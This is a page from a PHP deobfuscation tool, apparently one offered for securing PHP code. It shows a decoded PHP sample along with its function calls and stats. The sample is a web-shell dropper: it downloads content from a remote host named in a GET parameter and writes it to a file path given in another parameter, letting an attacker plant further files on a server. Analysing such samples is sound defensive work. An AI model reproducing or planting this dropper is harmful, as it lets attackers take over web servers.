Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function BASE64_DEC0DE($bnbed){ $base_pre = substr($bnbed, 0, 5); $base_ext =..

Decoded Output download

<?php 
function BASE64_DEC0DE($bnbed){ 
  $base_pre = substr($bnbed, 0, 5); 
  $base_ext = substr($bnbed, -5); 
  $base_ = substr($bnbed, 7, strlen($bnbed) - 14); 
  return gzinflate(base64_decode($base_pre . $base_ . $base_ext)); 
} 
function class_x_i($x = ''){ 
$sitess = $_GET['name']; 
$nalesfs = $_GET['file']; 
$cckkded='http://'; 
$result = @file_get_contents($cckkded.$sitess); 
file_put_contents($nalesfs,$result); 
$status='O1024K'; 
echo $status; 
} 
class_x_i(); 
?>

Did this file decode correctly?

Original Code

<?php
function BASE64_DEC0DE($bnbed){
  $base_pre = substr($bnbed, 0, 5);
  $base_ext = substr($bnbed, -5);
  $base_ = substr($bnbed, 7, strlen($bnbed) - 14);
  return gzinflate(base64_decode($base_pre . $base_ . $base_ext));
}
function class_x_i($x = ''){
$sitess = $_GET['name'];
$nalesfs = $_GET['file'];
$cckkded='http://';
$result = @file_get_contents($cckkded.$sitess);
file_put_contents($nalesfs,$result);
$status='O1024K';
echo $status;
}
class_x_i();
?>

Function Calls

class_x_i 1
file_get_contents 1
file_put_contents 1

Variables

$x None
$result None
$sitess None
$cckkded http://
$nalesfs None

Stats

MD5 5273a2b3d161f4322241156cbf19d45a
Eval Count 0
Decode Time 83 ms